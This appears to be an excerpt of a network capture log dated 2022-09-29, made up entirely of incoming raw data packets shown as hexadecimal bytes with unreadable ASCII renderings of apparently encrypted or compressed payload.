                                                                                                                                                2022-09-29 12:49:37 UTC7990INData Raw: 70 9b 0b 4a ca 86 9e 53 10 1f 8b d4 44 f5 1c 22 23 c0 04 96 54 1e 19 67 3c 04 51 44 d5 9a 76 05 5b 25 41 49 e6 e5 73 91 43 29 1c 0e 1b d4 3b fc b5 bc bd 9b b8 01 c9 65 1e 46 68 0a 89 ca 43 ce 83 28 1d 16 5b ea 6e bf 6d b2 fd 80 6b 42 c4 81 24 1f 48 4a bc 55 eb 4d 31 ac 36 f4 ae 34 1f 38 60 e3 74 17 d7 3b 9c 2d e6 21 dd 4f c7 88 38 a7 f4 14 50 cc 5b df cd 19 39 8e 35 b1 9f 5f 81 96 0f 7d 28 63 2c 73 5c ca 91 f4 62 1b b0 c0 2a 1b ba 92 63 13 eb 80 ba 34 2f 0f e3 e2 63 a1 43 70 0c da 2e a4 6a 23 22 18 8d 16 7b c4 b1 52 e5 3d 97 ab 60 83 7b b7 91 90 8e 84 ab 11 75 7e a8 48 56 f4 72 0b e0 cb b1 bb 46 dd b8 7e b3 8d e4 a2 1b 4f 61 82 19 0f 52 08 e7 74 23 92 1c 54 db 5f d6 32 ec 1b c6 44 4d a7 fa dd 14 d2 d8 24 92 58 07 83 ef b2 ef ec b8 dc b6 15 6c c8 71 c6 4b
                                                                                                                                                Data Ascii: pJSD"#Tg<QDv[%AIsC);eFhC([nmkB$HJUM1648`t;-!O8P[95_}(c,s\b*c4/cCp.j#"{R=`{u~HVrF~OaRt#T_2DM$XlqK
                                                                                                                                                2022-09-29 12:49:37 UTC8006INData Raw: 6e 18 88 1f 51 53 6c 0a c3 58 c3 54 86 19 b3 cc 87 01 80 4c e2 05 cf 85 74 e2 55 af b4 87 7f 2e 84 b7 55 02 c0 83 2e 63 0b 31 0d 7b 91 d0 42 95 82 23 ad bc 7e e1 96 c2 f3 5a 8d 67 bd 04 a2 05 95 79 02 d0 18 1d 48 16 66 0f 37 d1 bf 7b b9 87 37 dc 7c 11 2c ba d2 d4 57 c4 61 17 08 f6 f5 3a 3f 23 e9 45 b6 a8 f3 2d b6 91 68 78 62 23 24 a4 b1 69 02 cb 0b e9 f7 99 1a aa 94 6a 85 02 5a 44 4f 25 30 69 ba 2e d6 02 31 6d 88 1d 1e 60 21 55 b8 86 87 0b 76 54 cc cd 89 fb 51 a9 56 14 b3 16 db d2 8e 37 91 08 bc e5 69 53 94 a2 3c 3a 95 b4 66 f3 b1 ab 78 a9 50 f3 f3 a9 a0 87 9b e3 be ff d3 20 59 68 d2 23 f7 49 da f4 ad 87 4d 66 f6 ee a4 f8 75 08 ba ad 9d 40 08 f6 90 3a 30 13 da 72 be df df f2 0f 86 15 5b 38 f8 0f ab 2a 58 98 12 70 34 ec 48 43 dd fc f4 f9 33 55 60 cb c7 66
                                                                                                                                                Data Ascii: nQSlXTLtU.U.c1{B#~ZgyHf7{7|,Wa:?#E-hxb#$ijZDO%0i.1m`!UvTQV7iS<:fxP Yh#IMfu@:0r[8*Xp4HC3U`f
                                                                                                                                                2022-09-29 12:49:37 UTC8022INData Raw: 64 54 3e f3 ad 7c db a2 b7 11 a0 8f a2 63 d0 e2 6e 65 d0 63 ae dc 7e 59 19 be d7 0c d8 44 c3 34 f3 47 6b ce 54 a9 73 95 42 3a c3 13 bb 3a 6b e5 aa ec f2 00 fc 38 c1 5b 5f ad 61 0d f7 60 a3 29 03 39 cc 38 22 de 0e f9 ed e2 08 58 85 97 12 49 4e ae 5b 88 ea 86 e4 63 ec f7 98 3e 22 34 16 d7 bb ce 2b 3a dd 52 67 d1 9d eb 95 6b b0 af 1a f2 cf 6e 04 98 8c 63 28 f1 29 fc f3 dd 2f 80 0a 2e de 80 63 f3 dd a4 9e b2 d5 8a 2e 7b 17 ce f2 f2 cb de fb 24 2d 04 2a cf 2f 1e 7d 61 cf 6d 74 41 e4 0e 5d f1 50 c5 33 3b 65 6f de bb 2b c6 d9 ea 9f 82 26 16 58 45 93 1e f7 9e 2a 3f 0a 85 55 e2 e2 cb 2a cc 93 95 d1 a7 97 c2 6a d7 95 5e e1 26 da 78 97 f9 59 b4 8b b3 39 8e 48 fc 9a dd db 1a e0 3e ec ea b3 32 82 2d a5 91 9b 10 a2 a3 52 c0 4c 09 89 e2 c7 35 27 6b bc 00 19 2c 20 34 ac
                                                                                                                                                Data Ascii: dT>|cnec~YD4GkTsB::k8[_a`)98"XIN[c>"4+:Rgknc()/.c.{$-*/}amtA]P3;eo+&XE*?U*j^&xY9H>2-RL5'k, 4
                                                                                                                                                2022-09-29 12:49:37 UTC8032INData Raw: 58 d9 a1 0f 3e 7a 8c 3c 7b 11 fd ba 56 16 e3 d7 c4 41 a4 90 f5 13 08 b1 0f d9 ba b0 35 ee cb fe b9 c2 fe 2d 72 30 00 ff 7b dc 19 79 f1 8a 26 13 3e c1 b1 04 71 76 c6 47 52 3f 3d 04 07 fd b9 d5 85 39 2b e7 5d 67 ea 46 d2 56 ac 48 a5 1e 5b fb a7 7e 12 5f f1 f7 40 be 15 ae 14 9b 7d ed 1a d0 c8 24 a9 82 44 20 e7 bc 6a 62 ea d9 c8 21 8f 5c e7 12 94 e7 4f 2c 3a 8a 4f 58 49 ca d8 0b fe c0 40 7f bb bc 06 78 f6 dc 24 49 16 62 e1 ef f1 f3 4a ad c8 68 6f 21 14 f1 b1 c7 e9 e7 23 7c a3 9b 8b 55 34 a0 4b 24 60 33 43 73 80 da 06 6d 84 8f e8 79 3d 21 8b 7e de 39 26 d7 93 16 bb 84 67 29 5e 67 b9 c6 74 38 6a 44 a3 29 e0 38 1d c6 73 fa 15 7f b6 b0 01 4e 34 89 e6 45 9e be 85 54 f4 43 eb 82 b5 cf c5 f6 66 b4 7a 48 e0 b6 aa d9 1a 51 ab 91 f3 d0 09 5a a6 60 33 cf e0 75 0b 14 d0
                                                                                                                                                Data Ascii: X>z<{VA5-r0{y&>qvGR?=9+]gFVH[~_@}$D jb!\O,:OXI@x$IbJho!#|U4K$`3Csmy=!~9&g)^gt8jD)8sN4ETCfzHQZ`3u
                                                                                                                                                2022-09-29 12:49:37 UTC8048INData Raw: df ca 13 b7 bd 80 4a 5a 9d 14 3b 44 2a 30 88 83 00 53 ec 61 3b 9e 68 3c 31 19 e4 5d 36 db d8 29 5c b8 a4 43 3b 6d 49 ca fe 13 97 33 a0 34 1c 59 aa a6 a2 55 3a 19 17 e2 bb f6 7e 1d b9 d8 82 d9 9e 9b 9a d8 d8 8a 59 dc 3a 12 e4 53 4e 5f 05 c9 24 c8 16 3a 8e 81 57 28 c2 14 b7 db 20 99 d1 62 67 f5 17 17 39 4f f1 a5 0b 79 8c 21 2f 81 2f ba f2 0b a7 ef 80 73 c4 83 d5 1c 92 a6 2a e8 21 fa 8c 24 17 bd fb f7 a1 bc 9d 2b 90 76 9d 29 78 a1 ba 7a 78 ac 15 aa e7 e1 aa 38 01 f6 d8 93 19 ec 4c 84 ac d1 f8 39 50 5d 34 7b a9 ae 4e be bc 86 18 a3 ac cc 2e 8d 94 a4 b1 2c 17 db 20 56 24 ff e5 1f 5f f2 fa 7a 54 0a 6e 85 94 c8 06 58 80 06 a5 1a 26 da 0c 38 10 28 95 9c 9c 1a c0 98 6a 3c 14 a6 de 90 87 b2 42 d8 99 4d ff c7 78 27 d7 09 3b 12 04 0f ff 7a 38 b8 13 b1 3f aa 41 6b 9e
                                                                                                                                                Data Ascii: JZ;D*0Sa;h<1]6)\C;mI34YU:~Y:SN_$:W( bg9Oy!//s*!$+v)xzx8L9P]4{N., V$_zTnX&8(j<BMx';z8?Ak
                                                                                                                                                2022-09-29 12:49:37 UTC8064INData Raw: 16 e5 06 84 8c 80 60 4e 90 ac 51 98 39 3f 74 19 33 4d 6e e5 ad 86 29 e8 1b c9 ee 20 3a d8 e1 93 c0 be 8d 28 92 30 cd 96 c1 1d d9 b5 33 fe 3c 94 4f 8c 52 9b 18 5a 3e b9 1f 71 06 8f 40 e5 64 4d 67 d9 91 32 07 e0 06 90 af e1 69 14 90 71 75 9c 46 74 fe cc 3f 91 3c 96 ae f2 15 e3 d0 ac 92 99 49 4e f7 b9 71 83 ac 49 3c 41 a9 72 23 2a 46 7c 72 03 ce 0a f1 d9 8f 39 e0 aa 47 10 1a 41 8f 11 65 7b 6b 91 16 a4 78 68 d4 9f 40 0c 3c a3 30 4b 41 e6 52 f7 55 0e d5 8a 8d 96 15 53 be d7 f1 0f d3 cf 10 1f 74 c2 81 31 0e 08 ec 32 71 1a 6c 6f 53 3f 31 5f 2c 25 11 d2 65 d1 56 cc 54 1c d1 ad 5f c0 f5 a4 3e 17 44 7b f3 f4 71 e5 de 77 e2 9c 5d a5 6b 7d e5 88 aa 13 8a 3b cd 82 fb 39 d2 0d 5c 54 83 b8 43 23 cc 18 4d d0 98 98 5a 28 06 ea f4 04 49 43 14 2f 4c f5 49 66 c9 96 55 34 6f
                                                                                                                                                Data Ascii: `NQ9?t3Mn) :(03<ORZ>q@dMg2iquFt?<INqI<Ar#*F|r9GAe{kxh@<0KARUSt12qloS?1_,%eVT_>D{qw]k};9\TC#MZ(IC/LIfU4o
                                                                                                                                                2022-09-29 12:49:37 UTC8080INData Raw: aa 03 84 3c 13 9c aa dd 07 36 bd 11 21 08 af 28 f7 e1 ca 92 e4 ca 38 6e 57 12 20 6e f1 ed 20 7c 72 ba e6 2a 7e c5 60 01 45 43 27 65 00 5f 80 1d f7 1b 0e ab 3b b2 f6 ef 5d a4 72 83 84 59 99 33 48 b5 9d c6 d2 01 b8 dd 97 54 ca e9 4e b8 89 17 fe 13 6f 18 7f 6e c7 f8 e3 d3 24 fa 7f 52 d9 d4 d3 74 33 fa 62 f2 1f 47 11 5c 48 48 cd 17 a9 ff 34 63 ae 59 3f f4 14 31 66 e0 d3 e9 fc 1e 61 a9 3c d1 5a f4 37 52 88 50 fe e3 2b 04 a5 8a 31 c3 03 b2 72 ae 01 3b 3d ef ae 60 a1 53 f1 4c 36 69 0d 75 21 ba da c8 f7 0d e7 96 1f b9 b6 cd b7 07 e9 e0 32 20 99 f0 69 b8 7f aa a2 b3 5e 35 39 30 00 c4 15 e3 b1 40 c0 92 c4 31 f5 ea 51 57 c5 34 06 2f da c6 8f 56 1a fe 11 99 a9 4a 97 a0 60 4a 4a 5b 98 26 fc c4 bc a8 c4 92 ef 4c 2a 41 a1 ae ed f8 93 fe 34 a0 8b 55 46 2e 87 a0 fe be 4c
                                                                                                                                                Data Ascii: <6!(8nW n |r*~`EC'e_;]rY3HTNon$Rt3bG\HH4cY?1fa<Z7RP+1r;=`SL6iu!2 i^590@1QW4/VJ`JJ[&L*A4UF.L
                                                                                                                                                2022-09-29 12:49:37 UTC8096INData Raw: 45 e7 af 82 bc 44 d2 9b a3 96 be ff 9b 3f fb a8 7b 21 db ef 6e e2 bc 6d ae 6e 46 e4 cb c3 20 fc 26 b4 e9 b3 9e 2b 78 98 e0 d3 34 8d 41 b4 cc 9b 4f 9b 8b 4b 76 f7 f2 88 6a 49 05 29 96 f6 ef 39 28 c7 5e 83 7b c4 0b 72 0e 9c 56 3c b8 eb 05 d4 f3 f9 d3 3e 37 8e d4 bf b2 a5 a2 ed 83 9f 94 5f c3 7c 2d c8 2e d9 9c 7d 8a 1d d5 09 06 29 5c fc 38 37 11 d8 2e 9c ef 43 2b cb c0 f0 ba 44 b4 2c fe ae d9 a6 71 cc e1 cf 8d 1d c5 30 08 32 da ad e8 fa 41 fb 86 e8 98 45 af bb bf 3a 8c 86 de 42 ae 1f 8e 7c 8c af 08 14 49 99 0c 1e 1a 40 50 e7 90 42 b1 e8 30 3d ee 10 df 13 e3 5c 76 3a ea 48 9f 6a 27 9b 5f 07 73 c4 94 f0 08 94 92 0f da d5 94 8f cf ab b1 59 a2 60 2f fd e0 ba 7e 31 a2 18 d6 8a bd 40 26 f0 5b 71 45 35 01 1f 6f b6 e6 31 93 00 f9 4e c7 6a 4f 64 aa f5 f7 50 a4 50 78
                                                                                                                                                Data Ascii: ED?{!nmnF &+x4AOKvjI)9(^{rV<>7_|-.})\87.C+D,q02AE:B|I@PB0=\v:Hj'_sY`/~1@&[qE5o1NjOdPPx
                                                                                                                                                2022-09-29 12:49:37 UTC8112INData Raw: c8 cb fb a6 a8 82 49 12 e7 fb 5c 48 03 64 4c 58 c9 c0 aa 7c 20 78 7a f0 49 56 0c 5b 63 3e ec c2 51 de c4 b2 ac 55 1d 9f 59 72 51 e8 7a 1b 28 4a 65 e7 47 3d e2 b1 cb ca 2a 3d f2 32 45 c9 37 29 b2 67 9e 1b 47 52 b6 c4 77 54 1c ac be cf 98 4e a2 ee 3f f9 80 e3 fb f3 25 eb 5d d2 91 66 a1 6d 2d 5b 24 9c 45 62 ba 9a 16 df a5 66 32 60 3e 18 19 9c 9c ac 87 7e 65 9f cf c1 c7 a3 ae c7 a9 00 44 a3 c1 6a 0d 8d 73 02 df cb d1 bc ec 74 06 28 0f e0 e3 b6 8a 3f 12 e3 3c 3f 64 5c 59 0b b6 4a 3f b9 58 6b fd d3 8a a9 25 30 c1 c4 6a 3b f3 70 65 63 46 a8 9d 2a 11 9a a8 e7 f2 9c f5 06 a6 e7 76 d8 e7 92 87 d5 34 11 b9 0e cc 36 85 e3 70 73 16 19 a9 53 c5 89 50 6c 95 3e 82 35 ae 42 72 3e 67 d6 a4 00 c0 d3 55 79 f2 dd 61 05 fb 27 51 83 54 b6 9e da 75 95 4a f9 9e 0e d3 ea 04 70 ef
                                                                                                                                                Data Ascii: I\HdLX| xzIV[c>QUYrQz(JeG=*=2E7)gGRwTN?%]fm-[$Ebf2`>~eDjst(?<?d\YJ?Xk%0j;pecF*v46psSPl>5Br>gUya'QTuJp
                                                                                                                                                2022-09-29 12:49:37 UTC8128INData Raw: 8f c6 c3 6a eb ac 77 89 94 74 35 dc 86 3d 2b d1 55 36 24 72 c2 94 72 73 c8 33 de d3 fd 1f e4 47 21 e9 c6 9c 5d dd ec 76 d9 1c a1 fe 51 15 72 f4 d8 74 ed 39 8c e8 26 f3 0e 64 d6 97 83 65 a7 60 39 c3 dc d3 5d 22 8e 35 3c 58 74 0c 8e 79 d3 bf e3 fe 15 1f 3d d7 2d 6c 3c d8 a0 c1 0f 04 55 9c 1c d7 fb 9c 59 b6 77 f8 a9 34 6b ed 14 d5 f2 65 2f 85 e8 e1 a1 4e 00 bd 6d e6 58 4e a9 39 7e b3 c7 fd 3d 80 6f e2 a8 da 62 d4 82 34 ff b9 89 8a 33 c1 0b 2f 26 a8 94 71 4a 9e bc 3e 54 09 8f f1 ee 73 de 37 ab 9b 89 dd 3e c3 90 44 dd b1 d3 75 96 99 22 65 a5 fa 17 40 38 43 50 4d 3d fe c6 2a 40 a5 1c 60 dc 0a 27 84 74 26 f4 97 cb f6 a6 14 7c 57 81 f5 ad 3d e1 84 9f 15 e0 42 14 44 f5 83 86 5e ca 21 3f 6f 5d 89 fb 97 2a be 0a a0 68 2d c0 b0 87 a8 5a 59 62 29 52 67 b7 f9 68 f5 94
                                                                                                                                                Data Ascii: jwt5=+U6$rrs3G!]vQrt9&de`9]"5<Xty=-l<UYw4ke/NmXN9~=ob43/&qJ>Ts7>Du"e@8CPM=*@`'t&|W=BD^!?o]*h-ZYb)Rgh
                                                                                                                                                2022-09-29 12:49:37 UTC8144INData Raw: d3 df ff 57 23 60 e2 57 f8 00 c7 d0 e0 4a e7 75 9a 31 1e 73 bd 65 ad 03 20 84 49 fc 73 d2 a6 e4 41 da 32 87 4a db 05 74 37 b1 54 db 36 0a df 5b 04 bd ff d0 3f d4 46 75 8a 68 91 62 92 d5 14 74 c3 fb 55 79 6d 90 36 2e f2 f2 ff 75 6c 3a c7 d6 56 ee 2b 1f 3f 9b ec 86 68 0a 5e 64 4f d1 6e fe 6c 2a 45 4a 8b 24 f0 c8 f0 25 fc 9f 05 61 a2 0e 8e c7 f0 ae a7 f6 58 77 bc 3a cd 25 ff c6 84 00 13 bb 36 ee 56 f3 35 41 ce 7f bc 7b b5 cc d0 2e dd 8e b0 34 0f ea 8e de ca d9 8d cf 78 b1 f3 c4 be 38 92 c9 9f 3b fa fb 45 21 79 8f aa 01 a5 9f 60 9d 10 16 d8 d5 e7 1c 29 82 21 be 67 9e 9e a6 ce 29 82 90 db 45 5c 05 47 a8 97 bb 2d 17 cd b5 6d c8 c8 43 3c 05 68 e3 76 ed 8e 18 15 7c 92 c9 dc 46 1b e0 f0 87 e6 63 3f ab bd 41 07 b9 a9 8a cd 89 bc 40 ab 1c c6 f5 13 01 a1 c4 40 12 34
                                                                                                                                                Data Ascii: W#`WJu1se IsA2Jt7T6[?FuhbtUym6.ul:V+?h^dOnl*EJ$%aXw:%6V5A{.4x8;E!y`)!g)E\G-mC<hv|Fc?A@@4
                                                                                                                                                2022-09-29 12:49:37 UTC8160INData Raw: 0f 7d 45 d4 d7 38 a2 44 28 42 4d 6f 88 7e 5e 1d 82 0c b0 44 68 f4 ac 8b 39 31 34 75 b8 54 85 56 bd fb ec ba b2 0f ce 7f 83 20 a3 0e 59 56 b8 b5 85 ee dd d9 88 a8 d5 88 a9 da f4 de 1e 75 c7 36 a7 2d 40 ed 9d fc 80 84 68 2b ed 27 64 92 63 27 8b 08 3b 05 f6 d3 38 db 11 68 5b 56 ab dc 7f 2d c0 0f 07 fa 53 2a 81 32 94 5e d2 be 4f 08 41 b7 f6 15 5e 9e 5d 12 5e 91 ce 2f 1a ca 0b 6c 82 5e 2f 8e 26 67 5f bf 99 cc db d1 ad a4 ba ee 15 70 75 ae ee 9e ca c6 bb 26 4d 99 49 04 ad fc 4a a1 35 af a8 bd 04 e3 23 1d 44 2b bc 84 31 53 60 5f 16 5c a7 48 ca c0 8d 38 cb 89 43 1c 76 f5 03 88 16 87 cf 45 4e db 55 0e 6e 13 08 d7 81 ea db 22 00 e0 ae 36 dc 4d 8d a5 6e 06 4b bf a4 ed d8 3a 84 70 21 9d 7e 75 13 56 21 f2 ce 0a 7a 34 fb 92 55 44 b2 39 cd a8 84 45 a5 52 aa 0b d4 f7 77
                                                                                                                                                Data Ascii: }E8D(BMo~^Dh914uTV YVu6-@h+'dc';8h[V-S*2^OA^]^/l^/&g_pu&MIJ5#D+1S`_\H8CvENUn"6MnK:p!~uV!z4UD9ERw
                                                                                                                                                2022-09-29 12:49:37 UTC8176INData Raw: 8a aa e9 29 e2 9f 75 e2 e1 49 74 7e 87 12 c4 0b 3c 97 97 f8 f6 a1 6b b1 24 7d 25 b0 c9 5a 00 12 9b 30 85 b3 cb ed c8 23 86 f0 bc 4c ac 47 9e f1 f3 96 f5 fe 44 b1 52 8c d3 8b 64 f1 e6 3e 50 f3 6b 88 58 2a e8 fa b9 70 cf 09 7a c6 5f 0a 3f 4b a7 13 4b c6 e2 8c ef fc 59 cd ce 39 81 06 7b 5d 6b 23 dc 6d fe 56 83 b3 ca 90 ba 13 82 3f 60 0f a6 48 b7 6b bd 7b 67 0a e0 6a 25 22 d6 53 0f 2b 24 5d c0 a1 04 85 2c fb ee 8e b8 c4 d2 1c 07 09 9d bb 63 e2 82 f7 ca 83 1b 5f a4 a0 3c d6 c1 dd b4 ef 1b f9 86 d2 c8 d0 f5 72 13 d9 76 31 a6 67 54 1a 30 19 08 76 99 04 b3 02 ba 86 43 5e 78 f2 0d 58 3f 54 71 15 77 59 62 b7 e4 e1 1d f7 0e 2c ae 9e ab 55 06 a1 03 54 9a d6 43 16 ad 97 8b 49 d6 5a ba 68 9e 2f af 80 5b 2b ba e1 e5 e6 b4 88 d7 86 0f 58 8c 09 8a 83 d6 c8 54 07 0d f2 31
                                                                                                                                                Data Ascii: )uIt~<k$}%Z0#LGDRd>PkX*pz_?KKY9{]k#mV?`Hk{gj%"S+$],c_<rv1gT0vC^xX?TqwYb,UTCIZh/[+XT1
                                                                                                                                                2022-09-29 12:49:37 UTC8192INData Raw: 65 67 40 54 72 30 c3 b4 64 c9 07 3c c0 0f ec e3 c9 e5 aa 2f 71 cf 84 8d 7b d3 5d 9a e0 4a f9 5e 0c 46 b9 27 ed 2f 28 43 70 e3 1d 0a 7d 90 8f 52 2f b2 48 b0 0b 26 7e 69 ec 8b 18 c1 b8 6d 03 20 64 65 5e e5 70 c1 79 da 0f e1 fc a6 1d de 8b c9 00 f2 1b 7e a8 48 35 ec 56 37 13 a8 32 93 b5 4c 5a 54 d3 5d 0d 0f ef af 7d 08 2c b9 39 db c8 e6 84 1c f3 0c 25 91 17 67 8e 1b 49 10 4b ed cf 8c 0e 73 29 a8 cd 72 7c 28 44 ce 6b 5c d4 49 f6 69 da 51 15 95 cb 4b 96 af ec 37 6d 60 ad 03 0c 3d 92 a0 a9 89 2f cd 6c 29 b5 71 19 0f bb 35 10 2c d0 34 57 d1 b8 5d 74 ca 50 84 80 2e e8 33 28 92 d2 52 37 57 95 22 19 34 1f 9c 7a 3d e8 19 37 49 55 14 16 5a db bf d3 0a 98 fa ef 67 cc 2f fe 33 df e7 32 ee 4d d0 e5 d7 37 07 4d fa b7 b0 94 cf 4c 25 77 cb 0a d6 77 21 e6 d8 19 4b 9d cd b7
                                                                                                                                                Data Ascii: eg@Tr0d</q{]J^F'/(Cp}R/H&~im de^py~H5V72LZT]},9%gIKs)r|(Dk\IiQK7m`=/l)q5,4W]tP.3(R7W"4z=7IUZg/32M7ML%ww!K
                                                                                                                                                2022-09-29 12:49:37 UTC8208INData Raw: 93 22 80 d1 53 46 6c 95 3a 6b 91 4f ad 27 6b 32 8e 56 7e f6 cc 9e 63 49 54 94 d5 90 e1 47 c4 b8 49 a4 92 f6 1d 81 1f 9c 12 67 42 8d 41 16 12 61 72 ae 0a 4b 0a 37 4f 30 07 38 e6 1e 59 76 a1 2b fe b9 35 89 57 47 cd 1d cd 6d 58 5a c1 bd e8 50 81 13 34 92 46 5f cf 3b 42 0c 3e 83 11 44 32 5e 8f 28 04 39 6a 04 7d 11 6a d0 01 9e 89 e3 af fd 03 44 a6 25 a8 90 cf 4a 04 0e 8a 11 67 de 01 35 ab 8f f7 61 9d 11 f9 eb 9e 2f b4 b0 ef 6c 57 d3 b2 3d 6e 0c 56 a7 af c7 86 ba b4 2e de 37 1b b3 67 ee 99 10 f5 3c 1d 10 a9 25 45 f7 91 4a 59 cb 37 bb fa 90 be 57 42 45 4e 32 f9 6f 12 ca b7 45 a3 7a a0 e9 89 43 ac 7a 64 3e 04 a4 bd e4 45 37 93 90 36 6b 0e 22 c3 9c 4c 91 27 3d d9 52 14 f0 b9 df eb d2 1a a7 3c 29 dc ca 90 73 c0 5d f3 ea 0f 76 be 83 9b fd be d8 39 d5 56 24 c0 8f 47
                                                                                                                                                Data Ascii: "SFl:kO'k2V~cITGIgBAarK7O08Yv+5WGmXZP4F_;B>D2^(9j}jD%Jg5a/lW=nV.7g<%EJY7WBEN2oEzCzd>E76k"L'=R<)s]v9V$G
                                                                                                                                                2022-09-29 12:49:37 UTC8224INData Raw: 67 3d 38 a0 92 52 b8 b3 ea 0e 7c cf 4c d2 70 09 e1 f9 5e 59 19 6d ad 36 18 a6 ac d8 f6 61 f7 af 2b d3 3b 4c e3 8d 01 91 a2 6f e9 7f ee 0c 5e 24 d9 5f cb 68 e6 5b 7b 67 6e 8b 47 19 f2 02 bc 1e 46 c7 e2 65 a8 88 07 2a 8d 0c 93 0b f4 57 7e cd f1 fd c0 44 5a 89 14 d8 db e6 d4 e1 27 db 27 11 d5 6e c1 44 71 26 57 09 a9 59 0f ed 0d 6c bd 8b 1b 1e 19 6a 94 9f 15 92 90 9d 31 66 d4 5c 9c fb ea 44 59 b7 e2 22 15 33 11 24 db 26 57 2a 68 96 1c ab c5 26 eb 7d 35 30 44 d0 57 5c c4 7d 4c bf aa 7a c3 66 72 cf ad 00 dd 87 61 cc 7f 02 2b 02 98 25 1b ba 0d 19 6c 73 9f 15 44 f1 c1 04 2c 69 35 9d 81 cd e6 87 df 9e ba b8 3c a8 3b 49 12 55 43 8a 37 1d 62 b9 38 73 84 f5 85 ca 90 27 07 df 19 26 e8 aa 79 38 93 d2 50 4f f5 0c 41 80 6d d6 9f f3 17 7e 39 bc 3d 79 a1 e6 e1 b5 88 50 c3
                                                                                                                                                Data Ascii: g=8R|Lp^Ym6a+;Lo^$_h[{gnGFe*W~DZ''nDq&WYlj1f\DY"3$&W*h&}50DW\}Lzfra+%lsD,i5<;IUC7b8s'&y8POAm~9=yP
                                                                                                                                                2022-09-29 12:49:37 UTC8240INData Raw: 3f f2 a9 f6 2f 10 93 79 e6 18 11 94 73 29 79 65 31 6a ac 35 1b 46 0c ed b8 b9 a8 4c 79 e2 85 e2 73 b4 59 56 38 ce 0e f8 94 2d 84 08 ba 57 47 9e ba cc d6 59 12 4b 58 86 26 36 35 cf 61 d0 f5 9a dc be 90 b3 ed d8 23 a6 b3 13 98 76 c3 01 ee 93 40 30 88 ec 0d 40 15 f6 1b 19 10 4c 23 5b 8c 10 e4 6d 2e b5 53 ba 47 bc ce bd fa 7e 7c 54 56 41 64 9a 45 ee f7 88 4b e0 66 7d d7 56 c1 43 a7 76 c6 25 74 34 e6 16 9c fc 46 49 b4 7b 04 72 4a c6 d1 91 de 6c 55 1c 86 68 3c de 73 eb 38 43 4d 29 c4 e6 ed 46 f5 52 71 41 df e3 f3 5e 67 46 b1 80 dd 30 d3 c9 85 60 43 db 5c 45 04 be 4b 28 b0 21 0c ff 90 95 2f 00 30 a0 b7 6c 0b 79 4d ea b1 31 e1 c9 5d 82 3f 9d e4 1b 37 10 8f c7 df a2 5c fd 71 61 da f8 a8 25 ce 99 1b 49 e5 bb af 35 59 5e 9d 5d 73 c5 b9 0c 8f b7 fa 85 e8 19 23 60 8a
                                                                                                                                                Data Ascii: ?/ys)ye1j5FLysYV8-WGYKX&65a#v@0@L#[m.SG~|TVAdEKf}VCv%t4FI{rJlUh<s8CM)FRqA^gF0`C\EK(!/0lyM1]?7\qa%I5Y^]s#`
                                                                                                                                                2022-09-29 12:49:37 UTC8256INData Raw: a9 ee 85 9a 7b fd 3d 1f e4 45 42 fa b5 58 3d bf ac fc 53 ae 1e 38 85 a5 c2 41 98 66 87 df b7 3b d1 2b 2f f0 05 55 da 7e 26 cc 6b 0e 5f 98 40 6e e3 a8 40 c4 a7 24 f0 62 c7 36 c3 4e 0b 0a 7a 52 f4 77 8a b6 8f fd 00 bb fc c4 6e c7 7e 8f 4d 77 4d 45 96 a2 ca 53 e3 0f 0f 56 e3 98 3c 9b b3 4f fe a1 f9 a0 70 fa 57 e4 1f fd e8 db 5e 6c 29 6c ab 30 21 a2 ea d5 d6 75 09 f8 c8 b0 3e 52 e3 66 2e d7 95 95 b7 52 f9 86 d3 23 6e f9 aa d7 73 44 d4 d4 b9 f8 75 7c 0e 9d 82 52 bb c7 50 45 c4 16 4a 28 c1 4b 3f 56 b0 c5 61 33 ac 3d 1e 0c 63 e0 44 83 70 d1 0c a9 af 88 a7 f0 13 c5 ba 73 5e a7 3c 6a 90 de bd 06 7c 12 98 04 0b 2e 77 4b 05 1f e9 87 80 1f 4b 36 09 4f 5e 72 d3 c5 4f 77 3b b9 a3 af 18 5c 3c 50 ff e9 6e e1 bc 5a 07 21 15 21 c6 16 03 05 5d 0c 4d b3 e9 cf 15 a6 d2 1b fd
                                                                                                                                                Data Ascii: {=EBX=S8Af;+/U~&k_@n@$b6NzRwn~MwMESV<OpW^l)l0!u>Rf.R#nsDu|RPEJ(K?Va3=cDps^<j|.wKK6O^rOw;\<PnZ!!]M
                                                                                                                                                2022-09-29 12:49:37 UTC8272INData Raw: 3f 1c 5d cc 4b 05 08 7f 20 8c a2 e6 de 1f 83 63 87 fd 0a 8c 08 d2 b5 26 8b ab 7a c8 63 ab f0 43 22 b2 ad 37 1c b1 ad 5a a9 97 f2 c8 fd 2a 9c 79 38 ea ee 1e 90 3b 9d f2 e3 be 6e d3 bc 6b 40 0d f4 4d 2f d4 a0 a2 0d d4 25 99 cd d3 46 df 8a 9c 14 bc 4b 0c fd b3 c6 09 cd 5c 18 8b 1f 87 c4 ec bb c8 7d c4 77 51 9b 7c 4d fd e7 36 a5 da 33 c4 8a bc 49 e6 e2 4d 48 c8 d5 ed 53 5a f4 c5 98 16 67 93 88 29 26 3a a2 b0 c0 8a be d2 d2 61 e5 81 78 21 7d d7 f5 ed ed f0 3d af 43 8d 3d e8 06 91 a0 23 62 e6 59 51 22 5d 23 92 f1 69 71 16 aa 1e f0 7a bc ef 02 89 b9 c1 32 5a e7 1d c9 42 26 2a ed 6d 9d b1 14 1f 57 5f 61 b7 be 4c 09 ab d9 33 35 dc 99 68 01 af 09 b0 ae 46 e8 00 33 31 c9 4e 1e 45 b3 ec a1 e2 16 85 24 81 cf 32 a0 68 77 6e 37 fb 57 10 05 97 2b fc 76 b9 32 bf 82 ae cc
                                                                                                                                                Data Ascii: ?]K c&zcC"7Z*y8;nk@M/%FK\}wQ|M63IMHSZg)&:ax!}=C=#bYQ"]#iqz2ZB&*mW_aL35hF31NE$2hwn7W+v2
